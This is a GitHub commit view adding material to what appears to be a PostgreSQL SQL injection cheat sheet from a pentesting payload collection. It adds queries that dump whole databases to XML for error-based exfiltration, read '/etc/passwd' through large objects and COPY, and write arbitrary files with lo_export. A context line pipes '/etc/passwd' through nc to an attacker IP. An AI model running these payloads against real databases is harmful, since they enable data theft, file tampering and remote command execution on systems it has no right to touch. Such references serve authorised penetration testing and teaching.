Merge pull request #200 from denandz/master

Added Postgres SQLi information on xml helpers and file read/write
This commit is contained in:
Swissky 2020-05-05 15:14:39 +02:00 committed by GitHub
commit a322dc2da9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -14,6 +14,7 @@
* [PostgreSQL List tables](#postgresql-list-tables) * [PostgreSQL List tables](#postgresql-list-tables)
* [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL List columns](#postgresql-list-columns)
* [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Error Based](#postgresql-error-based)
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
* [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Blind](#postgresql-blind)
* [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Time Based](#postgresql-time-based)
* [PostgreSQL Stacked query](#postgresql-stacked-query) * [PostgreSQL Stacked query](#postgresql-stacked-query)
@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
``` ```
## PostgreSQL XML helpers
```sql
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
```
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
```sql
select database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
```
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
## PostgreSQL Blind ## PostgreSQL Blind
```sql ```sql
@ -135,7 +151,7 @@ select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200); select pg_read_file('PG_VERSION', 0, 200);
``` ```
NOTE: ``pg_read_file` doesn't accept the `/` character. NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
```sql ```sql
CREATE TABLE temp(t TEXT); CREATE TABLE temp(t TEXT);
@ -143,6 +159,12 @@ COPY temp FROM '/etc/passwd';
SELECT * FROM temp limit 1 offset 0; SELECT * FROM temp limit 1 offset 0;
``` ```
```sql
SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
SELECT lo_get(16420); -- use the OID returned from the above
SELECT * from pg_largeobject; -- or just get all the large objects and their data
```
## PostgreSQL File Write ## PostgreSQL File Write
```sql ```sql
@ -152,6 +174,12 @@ SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab'; COPY pentestlab(t) TO '/tmp/pentestlab';
``` ```
```sql
SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
```
## PostgreSQL Command execution ## PostgreSQL Command execution
### CVE-20199193 ### CVE-20199193
@ -181,3 +209,4 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)